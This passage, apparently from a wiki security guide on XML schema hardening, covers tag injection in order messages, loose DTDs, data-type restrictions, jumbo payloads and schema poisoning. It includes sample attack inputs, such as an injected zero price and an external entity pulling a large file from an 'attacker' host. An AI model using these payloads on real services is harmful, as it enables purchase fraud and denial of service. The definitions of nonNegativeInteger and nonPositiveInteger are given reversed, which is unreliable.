The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
